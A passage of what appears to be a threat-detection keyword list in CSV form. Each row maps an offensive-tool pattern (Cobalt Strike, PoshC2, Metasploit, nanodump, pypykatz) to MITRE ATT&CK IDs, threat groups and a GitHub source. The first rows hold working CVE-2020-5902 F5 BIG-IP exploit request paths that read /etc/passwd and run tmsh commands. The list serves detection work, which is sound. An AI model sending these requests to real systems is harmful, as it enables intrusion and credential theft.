/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/yasserjanah/CVE-2020-5902,1,0,N/A,N/A,1,37,13,2023-05-22T23:32:39Z,2020-07-06T01:12:23Z -*GET */tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/yasserjanah/CVE-2020-5902,1,0,N/A,N/A,1,37,13,2023-05-22T23:32:39Z,2020-07-06T01:12:23Z -*GET *https://*/tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=whoami*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*get_beacon(*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*get_BeaconHealthCheck_settings*,offensive_tool_keyword,cobaltstrike,This aggressor script uses a beacon's note field to indicate the health status of a beacon.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/beacon_health_check,1,1,N/A,10,10,138,25,2021-09-29T20:20:52Z,2021-07-08T13:28:11Z -*get_c2_messages*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*get_c2server_all*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*get_cmd_from_task_id*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - 
T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*get_dns_dnsidle*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*get_dns_sleep*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*Get_DPAPI_Protected_Files*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*get_filezilla_creds.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*get_hijackeable_dllname*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*get_implants_all*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*get_injection_techniques*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*get_keystrokes.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590,N/A,N/A,N/A,POST Exploitation 
tools,https://github.com/byt3bl33d3r/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*get_list_of_implant_text*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,0,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*get_masterkeys_from_lsass*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*get_newimplanturl*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*get_obfucation_string_dict*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,0,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*get_password_policy.x64.*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*get_password_policy.x86.*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 
Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*get_post_ex_pipename_list*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*get_post_ex_spawnto_x*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*get_process_inject_allocator*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*get_process_inject_bof_allocator*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*get_process_inject_execute*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider 
- Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*get_rooot.c*,offensive_tool_keyword,POC,Exploit for CVE-2022-27666,T1550 - T1555 - T1212 - T1558,TA0005,N/A,N/A,Exploitation tools,https://github.com/plummm/CVE-2022-27666,1,1,N/A,N/A,3,203,41,2022-03-28T18:21:00Z,2022-03-23T22:54:28Z -*get_sharpurls*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*get_stage_allocator*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - 
TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*get_stage_magic_mz_64*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*get_stage_magic_mz_86*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*get_stage_magic_pe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*get_virtual_Hook_address*,offensive_tool_keyword,cobaltstrike,A 
